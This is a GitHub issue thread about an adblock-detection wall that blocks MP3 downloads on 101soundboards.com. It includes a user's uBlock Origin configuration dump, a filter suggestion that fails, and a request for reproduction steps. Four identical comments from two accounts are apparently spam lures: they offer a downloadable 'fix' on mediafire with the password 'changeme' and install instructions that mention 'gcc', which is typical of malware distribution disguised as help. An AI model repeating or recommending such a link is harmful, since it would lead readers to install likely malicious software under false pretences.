### ISSUE TITLE
101soundboards.com: detection

### ISSUE THREAD

**Issue by einstein95** [uBlockOrigin/uAssets#25059]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://www.101soundboards.com/boards/36775-mr-frog`

### Category

detection

### Description

Attempting to download a sound gives an error about adblockers blocking downloads.

### Other extensions used

none

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

<img width="1140" alt="image" src="https://github.com/user-attachments/assets/1a52c1cb-e8be-489d-a062-9d70246db62c">

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Firefox: 129
filterset (summary):
 network: 131424
 cosmetic: 149858
 scriptlet: 31528
 html: 2191
listset (total-discarded, last-updated):
 removed:
  urlhaus-1: null
 added:
  block-lan: 71-0, now
  curben-phishing: 493-1, now
  adguard-cookies: 31299-46, now
  ublock-cookies-adguard: 1680-28, now
  fanboy-cookiemonster: 51739-3965, now
  ublock-cookies-easylist: 1680-1680, now
  fanboy-social: 16979-10, now
  fanboy-thirdparty_social: 68-16, now
  easylist-annoyances: 4744-53, now
  easylist-chat: 206-0, now
  easylist-newsletters: 7725-43, now
  easylist-notifications: 3483-164, now
  [1 lists not shown]: [too many]
 default:
  user-filters: 52-0, never
  ublock-filters: 39751-126, now
  ublock-badware: 10750-6, now
  ublock-privacy: 1065-4, now
  ublock-unbreak: 2566-1, now
  ublock-quick-fixes: 203-4, now
  easylist: 85555-179, now
  easyprivacy: 53048-66, now
  plowe-0: 3545-994, now
filterset (user): [array of 53 redacted]
trustedset:
 added: [array of 1 redacted]
userSettings:
 advancedUserEnabled: true
 userFiltersTrusted: true
hiddenSettings: [none]
supportStats:
 allReadyAfter: 758 ms
 maxAssetCacheWait: 411 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 5
 network:
  adinplay.com: 2
  fuseplatform.net: 2
  googletagmanager.com: 1
 extended:
  ##.ads_left
  ##.ads_right
  ##.share_buttons
  ##.shareBtn
  ##.back-to-top:not(body):not(html)
  ###AdHeader
  ###AD_Top
  ###homead
  ###ad-lead
  ##.ads_top_container_publift
  ##.publift_in_content_1
  ##.publift_in_content_2
```
</details>

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by stephenhawk8054** [comment]
Can you test this filter?

```adb
101soundboards.com##+js(no-fetch-if, googlesyndication)
```

Click on uBO icon > ⚙ [Dashboard button](https://github.com/gorhill/uBlock/wiki/Quick-guide:-popup-user-interface#the-tools) > Add the filter(s) in ["My filters" pane](https://github.com/gorhill/uBlock/wiki/Dashboard:-My-filters) > ✓ Apply changes > Open new tab and test again.

**Comment by einstein95** [comment]
> @einstein95 Can you test this filter?
> 
> ```
> 101soundboards.com##+js(no-fetch-if, googlesyndication)
> ```
> 
> Click on uBO icon > ⚙ [Dashboard button](https://github.com/gorhill/uBlock/wiki/Quick-guide:-popup-user-interface#the-tools) > Add the filter(s) in ["My filters" pane](https://github.com/gorhill/uBlock/wiki/Dashboard:-My-filters) > ✓ Apply changes > Open new tab and test again.

No luck sadly

**Comment by stephenhawk8054** [comment]
@einstein95 How can I download a sound? Do I need an account to do it? Can you describe the steps to reproduce in more details?

**Comment by einstein95** [comment]
> @einstein95 How can I download a sound? Do I need an account to do it? Can you describe the steps to reproduce in more details?

Certainly.
1. Click the `☰` next to the sound
2. Click "Download MP3"
